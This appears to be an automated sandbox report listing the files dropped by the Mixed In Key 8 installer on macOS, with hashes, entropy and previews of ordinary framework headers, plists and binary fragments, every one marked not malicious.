                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_aUWN5g
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):2685
                                                                                                    Entropy (8bit):4.9681700633831305
                                                                                                    Encrypted:false
                                                                                                    MD5:CF8A2FC905E6CB2C33CD47B42CD1F8DE
                                                                                                    SHA1:E66340BE42CD560EFA4DB423337EFF163CB4CC64
                                                                                                    SHA-256:183DCD20064A807D350759A62438AFC1C8AACA630FE67AE664B184F122D255DF
                                                                                                    SHA-512:D28B6C8470972D503AAE10E958B22526DA44272B01C27D95E22A70DC610512FBB96FC68D12F8C71A70EA375ECEBCC7854B58BBB26B1C465BB98C294DD94D7BFB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTraktorQueue.h.// MIKTag.//.// Created by patrickm on 19-11-15..// Copyright .. 2015 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..// notifications.extern NSString * _Nonnull const MIKTraktorQueueProgressChangedNotification;..//.equivalent to: MIKTagCompletionBlock.typedef void (^MIKTraktorQueueCompletionBlock)(BOOL success, NSError * _Nullable error);..typedef NS_ENUM(NSInteger, MIKTraktorCuePointExportStage) {. MIKTraktorCuePointExportStageIdle = 0,. MIKTraktorCuePointExportStagePending,. MIKTraktorCuePointExportStageLoading,. MIKTraktorCuePointExportStageUpdating,. MIKTraktorCuePointExportStageSaving.};..typedef struct {. MIKTraktorCuePointExportStage.stage;...//.export stage. NSUInteger ....count; // .current progress [unused]. NSUInteger.... total; //.total # of items [unused].} MIKTraktorCuePointExportProgress;.../**. * MIKTraktorQueue is used to schedule updates to the
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_c3QNvq
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1016
                                                                                                    Entropy (8bit):5.12901403890537
                                                                                                    Encrypted:false
                                                                                                    MD5:6AE6B70B50AFEB3FD80F6851EBA2DF5C
                                                                                                    SHA1:6B05DDEE651D487932EF36A9D888C17AB4427F3A
                                                                                                    SHA-256:EF64DD7ECB7BC02078F3D0A8BBB2A9225B0EE10E43C8625040078A00918970EF
                                                                                                    SHA-512:0D97D404D9A53D8F85EB63542B104A93F0FD47696CFFC81A9B63B4E98C05A9D6E5A300A69CC7C6C154A144B3F2620075AC7B52C2869377087C4E9A87728EB2C1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKRekordboxCuePoint.h.// MIKTag.//.// Created by Andrew Madsen on 10/8/14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..typedef NS_ENUM(NSInteger, MIKRekordboxCuePointType) {..MIKRekordboxCuePointTypeCue.. = 0,..MIKRekordboxCuePointTypeFadeIn,..MIKRekordboxCuePointTypeFadeOut,..MIKRekordboxCuePointTypeLoad,..MIKRekordboxCuePointTypeLoop.};..@class MIKRekordboxTrack;.@class MIKTagCuePoint;..@interface MIKRekordboxCuePoint : NSObject <NSCopying>..+ (instancetype)rekordboxCueWithCuePoint:(MIKTagCuePoint *)cuePoint atIndex:(NSInteger)index;..@property (nonatomic, strong, readonly) NSString *name;.@property (nonatomic, readonly) MIKRekordboxCuePointType type;.@property (nonatomic, readonly) NSTimeInterval start; // in seconds.@property (nonatomic, readonly) NSTimeInterval end; // in seconds.@property (nonatomic, readonly) NSInteger num; // 0-7. Position index in the 8 hot cues that Rekordbox can store. -1 = Me
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_dVe7pL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1403
                                                                                                    Entropy (8bit):5.059923013894868
                                                                                                    Encrypted:false
                                                                                                    MD5:F80547E1EAA691AB377F92A9810817C7
                                                                                                    SHA1:B5AAC4E22F0C24BB778F1497ACFA19182C76F995
                                                                                                    SHA-256:1CE052D2745FCE6AD7A577FA9DA3C7F839C36A066545465BB7804DD7FD4FEEAB
                                                                                                    SHA-512:B07FF9C6F2EAE99A12A6FDF17419EBDCC786B7B756C46B8F77595BA51DEF642D84B89D45E237BCE56F01BBD020087D729015004D406F8DD5900DC987B7D9B6A3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKRekordboxTrack.h.// MIKTag.//.// Created by Andrew Madsen on 10/8/14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..@class MIKRekordboxDatabase;.@class MIKRekordboxCuePoint;..@interface MIKRekordboxTrack : NSObject..@property (nonatomic, readonly) NSInteger trackId;.@property (nonatomic, strong, readonly) NSString *path;.@property (nonatomic, readonly) NSString *filename;.@property (nonatomic, strong, readonly) NSArray *cues;.//@property (nonatomic, readonly) NSDate *modificationDate;.@property (nonatomic, readonly) NSArray *beatTimes;..@property (nonatomic, readonly) NSString *decomposedStringWithCanonicalMapping; /* optimization */.@property (nonatomic, strong, readonly) NSXMLElement *xmlElement;..@property (nonatomic) BOOL forceDummyCuePoint; // Set to yes to output a single dummy cue point when none exists..// A dummy cue point is needed to allow deletion of cue points for a song in rekordbox, if there.// are no
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_dYvNSu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):503
                                                                                                    Entropy (8bit):5.303729905427616
                                                                                                    Encrypted:false
                                                                                                    MD5:571914AC4AC0B114F897F3C76F30352B
                                                                                                    SHA1:66A57B30A2C965655AF0BFF06F4FBB4AAFCC96E9
                                                                                                    SHA-256:72FE6B3ABE75CFF55FCDD707CC707B7AEEA67AF446FDCEE4B68A19836C49738C
                                                                                                    SHA-512:B7658C7924D6A49B55A51B7835B59C9928FF00DBBFFD8B358D1D1411E58F79141FAD2E2687172409556471303B1455648ED07CF53656C88B4047222B8A5282D8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagID3.h.// MIKTag.//.// Created by patrickm on 21-01-10..// Copyright 2010 Mixed In Key LLC. All rights reserved..//..#import "MIKTag.h"../*!. @header..MIKTagID3. @abstract Support for ID3v1 and ID3v2 files. @discussion TagLib upgrades v2 frames to v2.4.....http://www.id3.org/ID3v1.....http://www.id3.org/id3v2.4.0-frames.*/.@interface MIKTagID3 : MIKTag.@end..//.utility.FOUNDATION_EXPORT NSString * _Nullable MIKTagDecodeGRP1FrameData(const char * _Nullable data, uint len);.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_eH9wOM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):533
                                                                                                    Entropy (8bit):4.999493853489908
                                                                                                    Encrypted:false
                                                                                                    MD5:4EC1C96AEDF35E6B65692B52919D4B71
                                                                                                    SHA1:9242C5A438C11812348AE1B837DA1E23563D9F2C
                                                                                                    SHA-256:F2E1F2109F4E9E37E88ACC3D208CBB78435D6701A50CAB51666296099C34D6C9
                                                                                                    SHA-512:573FB9D0D30CD77B9A9CE858056141BAC23A3EAEC88F42C7E8D19E6CDBCD04DB1A937E96FBB8D9833563BD493C207CC4063575F2B4F2A58709EDEA39BAF88A22
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagAIFF.h.// MIKTag.//.// Created by patrickm on 10-08-12..// Copyright (c) 2012 mixedinkey.com. All rights reserved..//..#import "MIKTagID3.h"../*!..@header..MIKTagAIFF..@abstract Support for tags in aif(f) files..@discussion This class reads / writes ID3v2 tags which can be stored in a RIFF chunk......These are supported by iTunes and other audio apps. There is no suppport.....for reading or writing 'native' tags which are often used by professional.....applications.. */.@interface MIKTagAIFF : MIKTagID3..@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_kEoGJk
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):2498
                                                                                                    Entropy (8bit):5.114819980241135
                                                                                                    Encrypted:false
                                                                                                    MD5:AB57C8A471AD4610E9CEC8A5696E4683
                                                                                                    SHA1:863B60827DA07F11937C80A7C55E99AB8413E6BC
                                                                                                    SHA-256:01394F20585598D2CFD8C207EE0D7DBDA779A69066064F1FAC0D11AD5A250D61
                                                                                                    SHA-512:69B9A90F2444093633EA34ECD14F209EA1B9D87457A83A2A110C4CEC75CA9BFA9732AD8A60280A98D399B237A94C34004DE23208F131F98F65A9D86B62DAB4E4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagCopying.h.// MIKTag.//.// Created by patrickm on 28-09-12..// Copyright (c) 2012 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>.../*!..@header..MIKTagUtil..@abstract Utility functions for working with m4a and id3 tags...@discussion TagLib is used to handle m4a tags as well. CoreAudio still.....doesn't support m4a at all in 10.6. Quicktime might, but the.....code is very arcane and will become obsolete.. */../*!..@function.PNCopyID3Tag..@abstract Copy ID3 tag from source file to destination...@param sourcePath Path of the source file...@param destPath Path of the receiving file...@result YES if a tag was copied, NO otherwise.. */.FOUNDATION_EXPORT BOOL MIKCopyTagID3(NSString *sourcePath, NSString *destPath);../*!..@function.MIKCopyTagMP42ID3..@abstract Copy MP4 tag from source file to destination...@param sourcePath Path of the source file...@param destPath Path of the receiving file...@result YES if a tag was
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_kcy348
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):618
                                                                                                    Entropy (8bit):5.02936468421991
                                                                                                    Encrypted:false
                                                                                                    MD5:F1D2F3CA3F9285165C8A5FDDCEF71BCA
                                                                                                    SHA1:4D4EACBE7689459D986C45E5BA391B100248A218
                                                                                                    SHA-256:5787ED8D48D0CCB05A8DA1A711F604BEBEF4B7BF361329223F61146A32DCD441
                                                                                                    SHA-512:093533B179FA43A2AE9DD93DF9C2CD6AC0ADCC7B83A68E34CEBCE2B512EEB3C2FFE9BCABCF75705947FD1B52BE2AEAD3E991F6758A53DA6294B146056C2E01F5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagHeader.h.// MIKTag.//.// Created by Andrew Madsen on 11/18/15..// Copyright .. 2015 mixedinkey.com. All rights reserved..//../** Umbrella header for MIKTag public interface. */..#import <MIKTag/MIKTag.h>.#import <MIKTag/MIKTagComment.h>.#import <MIKTag/MIKTagCustomProperties.h>..#import <MIKTag/MIKTagCopying.h>.#import <MIKTag/MIKTagUtil.h>..#import <MIKTag/MIKTagAIFF.h>.#import <MIKTag/MIKTagFLAC.h>.#import <MIKTag/MIKTagID3.h>.#import <MIKTag/MIKTagMP4.h>.#import <MIKTag/MIKTagWAV.h>..#import <MIKTag/MIKTraktorDatabase.h>.#import <MIKTag/MIKTraktorQueue.h>.#import <MIKTag/MIKRekordboxQueue.h>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_klvNpM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):2681
                                                                                                    Entropy (8bit):5.024932221538651
                                                                                                    Encrypted:false
                                                                                                    MD5:07C338F2C4E652A80B4E16F5A903EF37
                                                                                                    SHA1:485CAF635544F1E317563428D5F5722C194D6905
                                                                                                    SHA-256:AE7D26E4AF42F86C09AAF6BE0B441514975ED17E88CCA50AC57ED71DCCBB384F
                                                                                                    SHA-512:AF5DB31526DB25E8339505798AF368F483458C88913A2375CB6F94C23CD1ED3E951D7AD656B166BB18D22D7884D31A7A71C6BA407419B608B54B513E9119A1B1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKRekordboxQueue.h.// MIKTag.//.// Created by patrickm on 19-11-15..// Copyright .. 2015 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..// notifications.extern NSString * _Nonnull const MIKRekordboxQueueProgressChangedNotification;..//.equivalent to: MIKTagCompletionBlock.typedef void (^MIKRekordboxQueueCompletionBlock)(BOOL success, NSError * _Nullable error);..typedef NS_ENUM(NSInteger, MIKRekordboxCuePointExportStage) {. MIKRekordboxCuePointExportStageIdle = 0,. MIKRekordboxCuePointExportStagePending,. MIKRekordboxCuePointExportStageLoading,. MIKRekordboxCuePointExportStageUpdating,. MIKRekordboxCuePointExportStageSaving.};..typedef struct {. MIKRekordboxCuePointExportStage.stage;...//.export stage. NSUInteger......count;...//.current progress. NSUInteger......total;...//.total # of items.} MIKRekordboxCuePointExportProgress;.../**. * MIKRekordboxQueue is used to schedule updates to the Rekordbox XML databas
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_wGtegq
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):697
                                                                                                    Entropy (8bit):5.055428834085401
                                                                                                    Encrypted:false
                                                                                                    MD5:DBB5B31F6192FAD739F473DD1E4D8020
                                                                                                    SHA1:0F00D479EC7F68D1D186ED30832B0FBA5E8B9B46
                                                                                                    SHA-256:A52C0B107A27FA81DB1CC2756DBB1B726FBBC951468C21F787E7F58CC989A24F
                                                                                                    SHA-512:019473E2C94CA04DBCF425C2D7B6725906F358B6EB78E647A66D2D1FEBEDCEF9D8E63874B79D67EADE4DE7105BCEE1BE117CF02A5A503AD46603FDF477578D77
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagErrors.h.// MIKTag.//.// Created by Andrew Madsen on 10/21/14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..extern NSString * const MIKTagErrorDomain;..typedef NS_ENUM(NSInteger, MIKTagErrorCode) {..MIKTagSaveError = 1,....MIKTagTraktorIsRunningError = 1000,..MIKTagSeratoIsRunningError,..MIKTagRekordboxIsRunningError,..MIKTagTraktorDatabaseFileReadError,..MIKTagTraktorDatabaseFileWriteError,..MIKTagRekordboxDatabaseFileWriteError,..MIKTagSandboxError,. MIKTagRekordboxDatabaseFileReadError.};..// User Info keys../**. * The MIKTag instance that generated the error.. */.extern NSString * const MIKTagErrorFailingTagKey;.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_wQM89R
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1699
                                                                                                    Entropy (8bit):5.2272972817655265
                                                                                                    Encrypted:false
                                                                                                    MD5:2F9A6D0B9E011DD0B291001690319462
                                                                                                    SHA1:623FA413ED005296EB0EE2FE42B95B0208170589
                                                                                                    SHA-256:724362C2E6443C0C5C32E20949CB5AD3893371E2168790B6AACB735305917DB9
                                                                                                    SHA-512:479C62144A1F5323AC12006A8EEE046B13FC2F14C66CEB852A453B87729CED407DB6A27DE22194ECDD55C080081A6DD03E7CB031DDDBC6E19C53226515E0ADBA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTraktorDatabase.h.// MixedInKey.//.// Created by Andrew Madsen on 10/7/14..// Copyright (c) 2014 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <MIKTag/MIKTraktorTrack.h>.#import <MIKTag/MIKTraktorPlaylist.h>.#import <MIKTag/MIKTraktorCuePoint.h>...extern NSString *const MIKTraktorFileFolderSandboxedBookmarkDataKey;../**. * This class is used to read from and write to a Traktor XML database file.. * It is used by Mixed In Key to save cue point information generated during. * MIK analysis to Traktor.. *.. *.@see https://mikteam.fogbugz.com/default.asp?W76. */.@interface MIKTraktorDatabase : NSObject..@property (nonatomic, strong, readonly) NSArray<MIKTraktorTrack *> *tracks;.@property (nonatomic, strong, readonly) NSArray<MIKTraktorPlaylist *> *playlists;.@property (nonatomic, assign, getter=isTraktorDBLoaded) BOOL traktorDBLoaded;.@property (nonatomic, readonly) NSDate *fileModificationDate;.@property (nonatomic, readonly) BOOL need
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Modules/.BC.T_so8dts
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII text
                                                                                                    Size (bytes):335
                                                                                                    Entropy (8bit):4.783634044835696
                                                                                                    Encrypted:false
                                                                                                    MD5:52AC089A106B5BE3907F40AFF4EC65B0
                                                                                                    SHA1:FEC282A467EC18B3DD3F40AF4E84B26D68CEB034
                                                                                                    SHA-256:60282CD995DAF53973003B9282C0E15EEFF3E81A4F13F7D0551A96E1CCEC3575
                                                                                                    SHA-512:D50575D278455C0528FC830BA16F36192E84F1B34241E66FE8B49F0633CF852ECF822F3B05ACB4C9DA8658613A0C0D4F9A0662266A06B2FC3B4EDA70DD677F2A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: framework module MIKTag {..umbrella header "MIKTagHeader.h"....export *..module * { export * }....explicit module MIKTagCuePoints {...header "MIKTagCuePoint.h"...header "MIKTraktorDatabase.h"...header "MIKTraktorTrack.h"...header "MIKRekordboxDatabase.h"...header "MIKRekordboxTrack.h"...header "MIKRekordboxCuePoint.h"...export *..}.}
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/.BC.T_ln4rGH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1335
                                                                                                    Entropy (8bit):5.222563360956588
                                                                                                    Encrypted:false
                                                                                                    MD5:3622A6B00BCFDBDA81C4A875C9847721
                                                                                                    SHA1:3A154AAD16DA9969CFCC826439F14CAFA0B43A7D
                                                                                                    SHA-256:ADB6C84D716370230D1FB4EB759902DBFB1F8CEAFE37C9D8D0AD090CB72B2DC3
                                                                                                    SHA-512:AB31B4F76430135E6FC08523D80A9FF55E56C50B393EF788C58D597860B4860D8A68F4E05E997BC760AA327DDB54019A3B72122F2957F96913D0EBB64A0CBE22
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>MIKTag</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKTag</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKTag</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<string
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/en.lproj/.BC.T_RKg5UL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode C program text
                                                                                                    Size (bytes):92
                                                                                                    Entropy (8bit):3.2610300066712608
                                                                                                    Encrypted:false
                                                                                                    MD5:51EF59B60E5B41B91519CC662A9FE886
                                                                                                    SHA1:3222CA0C39EB50AAF8126BAF852E55430C4718AF
                                                                                                    SHA-256:39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
                                                                                                    SHA-512:3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ../.*. .L.o.c.a.l.i.z.e.d. .v.e.r.s.i.o.n.s. .o.f. .I.n.f.o...p.l.i.s.t. .k.e.y.s. .*./.....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/_CodeSignature/.BC.T_Slc6Gh
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):8382
                                                                                                    Entropy (8bit):5.295330846030553
                                                                                                    Encrypted:false
                                                                                                    MD5:7A9DC9AA18B4E8DFF8E8E672857CC65D
                                                                                                    SHA1:B7547BDC98F6461B6EB75E3CA13554F01710B4EC
                                                                                                    SHA-256:B1300E9F81DEBD5668D974D238E81273FD94A97349FC675CD3AE6D23F1D9AD6C
                                                                                                    SHA-512:7FF15B4C9379A25849624C47C2AD72C92D4146F07BF2BE71B86FB78CE8A1A48D02892F19517F1956EBB4035DB8CCF90F544F356938E670FE01EE2361DC25E41D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...OhVKrRbamWnPzIJkOfFMr6C0On0=...</data>...<key>Resources/en.lproj/InfoPlist.strings</key>...<dict>....<key>hash</key>....<data>....MiLKDDnrUKr4EmuvhS5VQwxHGK8=....</data>....<key>optional</key>....<true/>...</dict>..</dict>..<key>files2</key>..<dict>...<key>Frameworks/TagLib.framework</key>...<dict>....<key>cdhash</key>....<data>....S5Lb0cMv0RQ/9A5KFfnBPs7Zi/w=....</data>....<key>requirement</key>....<string>identifier "com.mixedinkey.TagLib" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = T4A2E2DEM7</string>...</dict>...<key>Headers/MIKRekordboxCuePoint.h</key>...<dict>....<key>hash</key>....<data>....awXd7mU
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/.BC.T_7YfcYl
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):356560
                                                                                                    Entropy (8bit):5.846324723041686
                                                                                                    Encrypted:false
                                                                                                    MD5:3C4E991D03EF386689F22F1F1F49F27E
                                                                                                    SHA1:DFDDC8B33276E69FC2DF94D050327751C8FF898A
                                                                                                    SHA-256:0FA6771E5EFA88CD48DB58122684FC1BEDE8ECA057EB0BE675F2A3486D29BD2D
                                                                                                    SHA-512:74AC4E4253DD46259F19BDCB70B09E0DC256AF19CCA03D0BF0973D881AD37AB48BE363EC4F9BF5501F86C09E238F37A6BE6B0EB89CB2ABA938C9E48ADFD5782C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................@...............h...__TEXT..........................................................__text..........__TEXT..................9.......................................__stubs.........__TEXT..........F...............F...............................__stub_helper...__TEXT..........(...............(...............................__cstring.......__TEXT..................A-......................................__objc_methname.__TEXT..........G@......PW......G@..............................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT..........................................................__const.........__TEXT..........P...............P...............................__gcc_except_tab__TEXT..........8.......<.......8...............................__unwind_info...__TEXT..........t...............t...................................8...__DATA..........................................................__nl_symbol_ptr.__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_4MVUOq
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):9351
                                                                                                    Entropy (8bit):6.653442276295863
                                                                                                    Encrypted:false
                                                                                                    MD5:A8BAF74AB23EB40415F0F93B93CA0397
                                                                                                    SHA1:AD0BC52FB2962DCBB0484CF458D61E824E2B876F
                                                                                                    SHA-256:E12177BAAAF9E188F4B733498630A3EB8E0C40508F0B9356C11B1698E848B9C5
                                                                                                    SHA-512:BFAB720D1C2FB1BCA4A9B1464BD901826510301DB646721760DFE2EB8488C61CF2D093E8E9479F4B3C8A72A58FD76820ABD4816A75A466E28551192AD38D15FB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top.......i.......#.$.*...2.;.C.U._.`.z.{......................................................................... .$.%.&.'.../.4.9.:.=.>.?.B.C.H.I.M.X.Y.Z.[._.j.k.l.m.t.u.v.y..............................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....W.U.Q.g...g.f.h.V.. ...!."[NSClassName...._..MIKSlideUpPanelViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9...../.A.D.I.3..<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F...G.H.I.J.K.L.M.N.O.P.P.R.S.TVNSCellWNSFrame_..NSAllowsLogicalLayoutDirection_..NSNextResponder[NSSuperviewXNSvFlags]NSNibTouchBarYNSEnabled.............!....... .V.G.I.J.W.X.Y.Z.S.\.S.^ZNSSubv
